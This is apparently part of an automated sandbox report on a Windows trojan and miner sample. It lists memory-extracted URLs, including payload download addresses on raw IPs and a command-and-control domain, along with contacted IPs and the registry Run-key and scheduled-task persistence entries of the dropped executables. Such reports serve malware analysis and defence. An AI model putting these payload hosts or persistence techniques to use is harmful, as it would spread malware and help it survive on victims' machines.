                                                                https://solutionhub.cc/-;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  http://www.goodfont.co.krMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    http://185.196.10.57/selectex-file-host/acev.exeexplert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      http://www.sajatypeworks.comMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        https://solutionhub.cc/s;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          http://www.typography.netDMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://www.founder.com.cn/cn/cTheMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://www.galapagosdesign.com/staff/dennis.htmMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                http://185.196.10.57/selectex-file-host/Support.exeXexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://185.196.10.57/selectex-file-host/Support.exelert.exejFsys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://solutionhub.cc/bexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://solutionhub.cc:443/socket/nx8d.exe/IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://api.msn.com/qIIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://solutionhub.cc/e;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://185.196.10.57/selectex-file-host/Support.exesys_updater.exe, 0000001B.00000003.2757593840.00000159F35FD000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E49505000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://discord.com/api/v9/users/MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                https://solutionhub.cc/kexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  http://185.196.10.57/selectex-file-host/Support.exeh7explert.exe, 00000004.00000003.2049062888.000000000142F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://www.galapagosdesign.com/DPleaseMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      http://www.fonts.comMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        http://www.sandoll.co.krMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://solutionhub.cc/Uexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://www.urwpp.deDPleaseMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://solutionhub.cc:443/socket/b.cc/IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                http://www.zhongyicts.com.cnMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://www.sakkal.comMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://solutionhub.cc/Zexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://185.216.214.218/explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://www.fontbureau.comMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://api.ip.sb/ipMSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              http://185.196.10.57/selectex-file-host/Support.exe:IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://www.m.sys_updater.exe, 0000001F.00000003.2918254433.0000020E49495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://solutionhub.cc/;;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://185.216.214.218/Population.exet.exehexplert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://185.196.10.57/selectex-file-host/Support.exeswFCHOzyfyz5b.exesys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://185.196.10.57/selectex-file-host/acev.exe%explert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://discord.0vMSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://solutionhub.cc/8explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://185.196.10.57/selectex-file-host/Support.exelert.exe)GgIIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BD6000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                https://solutionhub.cc/T;sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://185.216.214.218/Population.exeexplert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://www.carterandcone.comlMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://solutionhub.cc:443/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAsys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://solutionhub.cc/;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            http://go.microso(sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://www.founder.com.cn/cnMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://go.2sys_updater.exe, 00000018.00000003.2650108761.0000021E02FCE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2650910116.0000021E02FD0000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651562106.0000021E02FD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://solutionhub.cc/O;.IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://www.jiyu-kobo.co.jp/MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://185.196.10.57/selectex-file-host/Support.exelert.exeIIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BD6000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://feedback.screenconnect.com/Feedback.axdFRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                                            http://www.fontbureau.com/designers8MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://api.msn.com/IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://185.196.10.57/explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://solutionhub.cc/sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://185.216.214.218/Population.exeUexplert.exe, 00000004.00000003.1829302373.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1797286786.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://solutionhub.cc/socket/?id=5A9B846E0A19DD545B8CA4BF94E01DCEB8D04EDC07764AA4329CDB473E7FBAA3&usys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://solutionhub.cc/2;sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public IPs

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          185.196.10.57
                                                                                                                                                                                          		unknownSwitzerland
                                                                                                                                                                                          		42624SIMPLECARRIERCHfalse
                                                                                                                                                                                          212.47.253.124
                                                                                                                                                                                          		unknownFrance
                                                                                                                                                                                          		12876OnlineSASFRfalse
                                                                                                                                                                                          188.114.97.3
                                                                                                                                                                                          		unknownEuropean Union
                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                          		unknownEuropean Union
                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          146.59.154.106
                                                                                                                                                                                          		unknownNorway
                                                                                                                                                                                          		16276OVHFRfalse
                                                                                                                                                                                          185.216.214.218
                                                                                                                                                                                          		unknownGermany
                                                                                                                                                                                          		205388SERVERDISCOUNTERserverdiscountercomDEfalse

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                          Analysis ID:1479881
                                                                                                                                                                                          Start date and time:2024-07-24 09:25:33 +02:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 15m 8s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Number of analysed new started processes analysed:45
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:RPHbzz3JqY.exe
                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                          Original Sample Name:848abdbd09c052799a0e0180b59f6fee.exe
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal100.troj.evad.mine.winEXE@69/36@0/6
                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 97%
                                                                                                                                                                                          • Number of executed functions: 43
                                                                                                                                                                                          • Number of non-executed functions: 146
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                          Warnings

                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                          • Skipping network analysis since amount of network traffic is too extensive

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                          03:26:26API Interceptor103676x Sleep call for process: explert.exe modified
                                                                                                                                                                                          03:27:23API Interceptor57898x Sleep call for process: IIZS2TRqf69aZbLAX3cf3edn.exe modified
                                                                                                                                                                                          03:29:23API Interceptor95x Sleep call for process: Cerker.exe modified
                                                                                                                                                                                          08:26:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          08:26:25Task SchedulerRun new task: explert.exe path: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          08:26:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          08:27:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          08:27:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          08:27:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          08:27:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          08:28:40Task SchedulerRun new task: Cerker.exe path: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          08:28:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          08:28:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          No context

                                                                                                                                                                                          Domains

                                                                                                                                                                                          No context

                                                                                                                                                                                          ASNs

